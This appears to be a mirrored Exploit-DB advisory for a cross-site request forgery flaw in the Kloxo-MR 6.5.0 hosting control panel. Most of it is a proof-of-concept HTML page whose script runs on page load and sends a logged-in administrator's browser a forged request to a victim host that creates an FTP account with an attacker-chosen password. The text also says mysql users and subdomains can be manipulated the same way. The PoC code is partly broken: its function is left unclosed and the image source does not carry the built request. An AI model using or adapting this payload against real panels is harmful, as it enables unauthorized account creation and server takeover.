Kloxo-MR 6.5.0 – Cross-Site Request Forgery

  • 作者: Necmettin COSKUN
    日期: 2014-04-02
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/32666/
  • # Exploit Title		:Kloxo-MR 6.5.0 CSRF Vulnerability
    # Vendor Homepage	:https://github.com/mustafaramadhan/kloxo/tree/dev
    # Version	:Kloxo-MR 6.5.0.f-2014020301
    # Tested on			:Centos 6.4
    # Exploit Author	:Necmettin COSKUN =>@babayarisi
    # Blog				:http://www.ncoskun.com http://www.grisapka.org
    # Discovery date	:03/12/2014
    # CVE				:N/A
    Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
    This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
    CSRF Vulnerability
    Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key 
    So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
    Poc Exploit
     <head><title>Kloxo-MR demo</title></head>
     <script type="text/javascript">
     function yurudi(){
    		//Kloxo-MR 6.5.0CSRF Vulnerability		 //	
    		//Author:Necmettin COSKUN => twitter.com/@babayarisi	 //
    		//Blog: http://www.ncoskun.com | http://www.grisapka.org //
    		//Remote host
    		var host="victim.com";	
    		//New Ftp Username
    		var username="demouser";
    		//New Ftp Password
    		var pass="12345678";
    		//This creates new folder under admin dir. /admin/yourfolder
    		var dir="demodirectory";
    		//If necessary only modify http to https ;)
    		var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
     <body onload="yurudi();">
     <img id="demoexploit" src="https://www.exploit-db.com/exploits/32666/"></img>
    Discovered by:
    Necmettin COSKUN|GrisapkaGuvenlikGrubu|4ewa2getha!